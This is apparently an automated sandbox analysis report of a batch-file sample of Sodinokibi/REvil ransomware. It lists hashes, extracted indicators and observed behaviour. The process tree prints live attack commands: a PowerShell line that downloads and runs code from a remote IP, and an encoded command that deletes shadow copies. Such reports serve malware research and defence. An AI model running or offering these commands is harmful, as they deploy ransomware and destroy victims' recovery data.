Analysis
-
max time kernel
136s -
max time network
154s -
platform
windows10_x64 -
resource
win10v200722 -
submitted
19-08-2020 19:10
Static task
static1
Behavioral task
behavioral1
Sample
82d5933a7fe8497bb64008a8ad2bdaa6.bat
Resource
win7v200722
Behavioral task
behavioral2
Sample
82d5933a7fe8497bb64008a8ad2bdaa6.bat
Resource
win10v200722
General
-
Target
82d5933a7fe8497bb64008a8ad2bdaa6.bat
-
Size
220B
-
MD5
613e281b75ac4b2fdf68a543bf8e3910
-
SHA1
04cba786c3f966f0b61a930155de7ccfb85e5edb
-
SHA256
697fd96092e104056ff21a7acab7b07da036f4e8d6cb9f672814b51be95591ed
-
SHA512
389ba3e5b8d2188f3d1b6acb152607b567c815869ef0435e55e9eaa3ee93e31a692cc647369e21786c56bdd178bc6413f881abfcc2c8b5b38493891a86907dcb
Malware Config
Extracted
http://185.103.242.78/pastes/82d5933a7fe8497bb64008a8ad2bdaa6
Extracted
C:\ja1kdhk2-readme.txt
sodinokibi
http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/60709E04D1E2CABE
http://decryptor.cc/60709E04D1E2CABE
Signatures
-
Sodin,Sodinokibi,REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
-
Blacklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 9 504 powershell.exe -
Modifies extensions of user files 5 IoCs
Ransomware generally changes the extension on encrypted files.
Processes:
powershell.exedescription ioc process File renamed C:\Users\Admin\Pictures\UnpublishPush.tif => \??\c:\users\admin\pictures\UnpublishPush.tif.ja1kdhk2 powershell.exe File renamed C:\Users\Admin\Pictures\DisconnectFormat.raw => \??\c:\users\admin\pictures\DisconnectFormat.raw.ja1kdhk2 powershell.exe File renamed C:\Users\Admin\Pictures\MeasureDebug.raw => \??\c:\users\admin\pictures\MeasureDebug.raw.ja1kdhk2 powershell.exe File renamed C:\Users\Admin\Pictures\ShowFormat.crw => \??\c:\users\admin\pictures\ShowFormat.crw.ja1kdhk2 powershell.exe File renamed C:\Users\Admin\Pictures\UnlockResolve.raw => \??\c:\users\admin\pictures\UnlockResolve.raw.ja1kdhk2 powershell.exe -
Enumerates connected drives 3 TTPs
-
Modifies service 2 TTPs 4 IoCs
Processes:
vssvc.exedescription ioc process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer vssvc.exe -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
Processes:
powershell.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-1400429095-533421673-2598934218-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\qelnlq610812.bmp" powershell.exe -
Drops file in Program Files directory 31 IoCs
Processes:
powershell.exedescription ioc process File opened for modification \??\c:\program files\ExportConnect.3gp2 powershell.exe File opened for modification \??\c:\program files\RedoRepair.cfg powershell.exe File opened for modification \??\c:\program files\ResetEnter.xlt powershell.exe File opened for modification \??\c:\program files\SaveFind.js powershell.exe File opened for modification \??\c:\program files\SearchProtect.inf powershell.exe File opened for modification \??\c:\program files\CheckpointGroup.php powershell.exe File opened for modification \??\c:\program files\FindMount.dwg powershell.exe File opened for modification \??\c:\program files\PopEdit.tiff powershell.exe File opened for modification \??\c:\program files\SaveUnblock.ADTS powershell.exe File opened for modification \??\c:\program files\UnregisterUnblock.png powershell.exe File opened for modification \??\c:\program files\BlockShow.ppsm powershell.exe File opened for modification \??\c:\program files\JoinMount.dwfx powershell.exe File opened for modification \??\c:\program files\LimitExport.vdw powershell.exe File opened for modification \??\c:\program files\RegisterUninstall.DVR powershell.exe File opened for modification \??\c:\program files\RestoreGet.dotx powershell.exe File opened for modification \??\c:\program files\ReadPublish.vssm powershell.exe File opened for modification \??\c:\program files\DismountWatch.vbs powershell.exe File opened for modification \??\c:\program files\EnableComplete.kix powershell.exe File opened for modification \??\c:\program files\LimitDisable.pptx powershell.exe File opened for modification \??\c:\program files\OpenClose.otf powershell.exe File opened for modification \??\c:\program files\UpdateReceive.tif powershell.exe File created \??\c:\program files\ja1kdhk2-readme.txt powershell.exe File opened for modification \??\c:\program files\ClearUnlock.ttf powershell.exe File opened for modification \??\c:\program files\UninstallReceive.wps powershell.exe File opened for modification \??\c:\program files\UnprotectEnable.odp powershell.exe File created \??\c:\program files (x86)\ja1kdhk2-readme.txt powershell.exe File opened for modification \??\c:\program files\BackupStep.mp3 powershell.exe File opened for modification \??\c:\program files\LimitMerge.001 powershell.exe File opened for modification \??\c:\program files\ResetExport.rtf powershell.exe File opened for modification \??\c:\program files\UndoSkip.wax powershell.exe File opened for modification \??\c:\program files\UpdateUndo.js powershell.exe -
Suspicious behavior: EnumeratesProcesses 8 IoCs
Processes:
powershell.exepowershell.exepid process 504 powershell.exe 504 powershell.exe 504 powershell.exe 504 powershell.exe 504 powershell.exe 1716 powershell.exe 1716 powershell.exe 1716 powershell.exe -
Suspicious use of AdjustPrivilegeToken 7 IoCs
Processes:
powershell.exepowershell.exevssvc.exedescription pid process Token: SeDebugPrivilege 504 powershell.exe Token: SeDebugPrivilege 504 powershell.exe Token: SeDebugPrivilege 1716 powershell.exe Token: SeBackupPrivilege 3868 vssvc.exe Token: SeRestorePrivilege 3868 vssvc.exe Token: SeAuditPrivilege 3868 vssvc.exe Token: SeTakeOwnershipPrivilege 504 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
Processes:
cmd.exepowershell.exedescription pid process target process PID 3288 wrote to memory of 504 3288 cmd.exe powershell.exe PID 3288 wrote to memory of 504 3288 cmd.exe powershell.exe PID 3288 wrote to memory of 504 3288 cmd.exe powershell.exe PID 504 wrote to memory of 1716 504 powershell.exe powershell.exe PID 504 wrote to memory of 1716 504 powershell.exe powershell.exe PID 504 wrote to memory of 1716 504 powershell.exe powershell.exe
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\82d5933a7fe8497bb64008a8ad2bdaa6.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:3288 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/82d5933a7fe8497bb64008a8ad2bdaa6');Invoke-LIEITOMPTWTBU;Start-Sleep -s 10000"2⤵
- Blacklisted process makes network request
- Modifies extensions of user files
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:504 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1716
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Modifies service
- Suspicious use of AdjustPrivilegeToken
PID:3868